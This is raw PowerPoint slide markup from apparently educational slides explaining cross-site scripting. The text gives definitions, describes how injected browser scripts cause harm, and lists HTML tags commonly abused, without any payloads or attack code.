            <a:pPr marL="411480" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Connector 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2926080" y="3276600"/>
            <a:ext cx="0" cy="1524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26080" y="3429000"/>
            <a:ext cx="1828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754880" y="3200400"/>
            <a:ext cx="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362200" y="3048000"/>
            <a:ext cx="2895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nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2438400" y="4800600"/>
            <a:ext cx="2895600" cy="609600"/>
            <a:chOff x="2362200" y="2895600"/>
            <a:chExt cx="2895600" cy="609600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20" name="Straight Connector 19"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2941320" y="3142488"/>
              <a:ext cx="0" cy="1524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941320" y="3307080"/>
              <a:ext cx="91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855720" y="3087624"/>
              <a:ext cx="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362200" y="2895600"/>
              <a:ext cx="2895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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1156132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Cross-site scripting (XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>An XSS flaw occurs when an application: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buChar char="—"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>contains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>untrusted data in a new web page without </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>proper  validation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>or escaping, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buChar char="—"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>it updates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>an existing web page with untrusted user-supplied data using a browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>API that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>can create HTML or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>allows attackers to execute scripts in a victim's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>browser which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>can hijack user sessions, deface web sites, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>redirect the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>user to malicious sites.</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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4227730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458200" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Cause </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>&amp; effect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>of HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1143000"/>
            <a:ext cx="8001000" cy="5562600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>An integral component of the services provided by online organizations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>are web servers that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>deliver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>dynamic content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>to Internet clients which can be tuned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>to individual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>requirements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>sites that transfer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>dynamic content </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>to client web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>browsers have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>become a ubiquitous platform for content delivery that keeps </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>growing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Unfortunately</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, due to poorly developed application code and data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>processing systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, the majority of these web sites are vulnerable to attacks that focus upon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>the way </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>HTML content is generated and interpreted by client browsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Attackers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>often are able to insert malicious HTML-based content within </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>client web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>. Such </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>flaws can be exploited by embedding scripting elements within </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>the returned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>content without the knowledge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>of clients.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>the inserted malicious content is interpreted by the client's browser as script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>it is likely to be executed by the client browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>enables the adversary to run a malicious program on the client's computer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.</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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2216488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762000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Code Insertion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1600200"/>
            <a:ext cx="7924800" cy="4038600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The success of XSS attacks hinges upon the functionality of the client browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>distinguish displayable text from the interpreted markup language in HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>characters are treated specially. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>following HTML scripting tags are most often used to embed malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>content:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt; script&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>adds a script to be used into the document  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;object&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>places an object into the document </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;applet&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>places a Java applet into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;embed&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>embeds an object into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>document</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;format&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>indicates the beginning and end of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>format</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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3116927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457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Code Insertion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1371600"/>
            <a:ext cx="8229600" cy="5943600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>most web browsers have the ability to interpret scripts embedded </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>within HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>content enabled by default</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>an attacker successfully inject script content, it will likely </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>be executed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>within the context of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>delivery (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a website) by the end user. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Such </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>scripts may be written in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>any number </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of scripting languages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, provided </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that the client host can interpret the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Consider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for example the case of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;format&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>inserting appropriate HTML tag information, an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attacker could </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>trick visitors to the site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>into revealing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sensitive information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(e.g., username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/ password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>modifying the existing form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML tags may be inserted to alter the appearance and behavior of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>page (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>alteration of the online annual accounts of an organization).</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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1857396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838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Cross-site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="914400"/>
            <a:ext cx="8153400" cy="5943600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Open Web Application Security Project (OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>) defines XSS as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>a type of injection in which malicious scripts are injected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>into benign </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>and trusted websites. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>XSS attack occurs when an attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>uses a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>web application to send malicious code, generally in the form of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>browser script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>to a client web browser. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>attacker takes control of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>victim's browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>and can: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buChar char="—"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>modify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the content/layout of the victim’s site </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buChar char="—"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>steal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>user's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>unprotected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buChar char="—"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>code on behalf of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buChar char="—"/>
            </a:pPr>
            <a:r>
